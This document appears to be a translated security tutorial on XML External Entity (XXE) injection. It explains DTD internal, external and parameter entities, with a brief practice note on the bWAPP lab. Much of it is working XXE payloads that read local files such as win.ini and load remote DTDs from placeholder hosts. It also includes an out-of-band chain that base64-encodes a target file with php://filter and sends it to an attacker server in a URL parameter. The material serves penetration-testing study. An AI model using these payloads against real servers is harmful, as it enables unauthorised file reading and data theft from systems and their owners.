Precondition
In libxml2.9.1 and later, external entities are not parsed by default.
You can use phpinfo() to view the version information of libxml. Add phpinfo.php after the URL
XML document
Composition: xml declaration, DTD part, xml part
cross-domain-policy root node, http://...dtd reference file location
DTD (Document Type Definition)
defines semantic constraints for xml documents, internal declarations, and external references.
Dtd usage reference content: https://blog.csdn.net/qq_40849099/article/details/80457850
DTD knowledge
1. Internal entity declaration
<!ENTITY entity name "entity value"><?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe "test" >
]>
Defining the element as ANY means that any element is accepted, but an xml entity is defined. The entity can actually be regarded as a variable, which can be referenced by the & symbol in XML
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
Use &xxe to reference the xxe entity defined above, and &xxe will be replaced by "test" when outputting.
Note: The & symbol must be url-encoded, otherwise it may be executed as a connector
2. External entity declaration
<!ENTITY entity name SYSTEM "URI/URL">External references can support protocols such as http and file. Different languages support different protocols, but there are some common
protocols.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/test.dtd" >
]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
Entities can be divided into (general entities, parameter entities)
general entities
. The entities referenced by & entity name; are defined in DTD, and parameter entities are referenced in XML documents.
xx.dtd文件
<!ENTITY evil SYSTEM "file:/// :/windows/win.ini" >
xx.xml文件
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://ip:端口/xx.dtd" >
%xxe;]>
<foo>&evil;</foo>
(1) Use % entity name (with no less spaces) defined in DTD, and only use% entity name in DTD; reference
(2) Only in DTD file, parameter entity declaration can refer to other entities
(3 ) Like general entities, parameter entities can also be referenced externally
Reference document: https://xz.aliyun.com/t/3357
XXE use
Only the DTD part can be used in xml
注入内容
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]>
<foo>&xxe;</foo>
or
注入内容
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://xxx.xxx.xxx/xx.dtd" >
%xxe;]>
<foo>&xx;</foo>
外部xx.dtd内容
<!ENTITY xx SYSTEM "file:///c:/windows/win.ini" >
If there is an echo, you can directly see the content of the echo. If there is
no echo, use the external data channel to extract the data. First use php://filter to get the content of the target file,
and then send the content to the server that receives the data (attack server) xxx as an http request. xxx.xxx
注入内容
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE convert [
<!ENTITY % remote SYSTEM "http://ip/test.dtd">
%remote;%int;%send;
]>
The content of external test.dtd, the internal% sign must be entity-encoded as %
<!ENTITY % file SYSTEM
"php://filter/read=convert.base64-encode/resource=file:///c:/1.txt">
<!ENTITY % int "<!ENTITY % send SYSTEM
'http://ip?p=%file;'>">
If there is an error without echo, directly decode the error content. If there is
no echo without error, decode the content in the error log (access.log).
Where can I find the error log?
Actual combat (bwapp)
There is a pit here, it can only be sent once, not continuously. If you want to try, you need to capture the packet again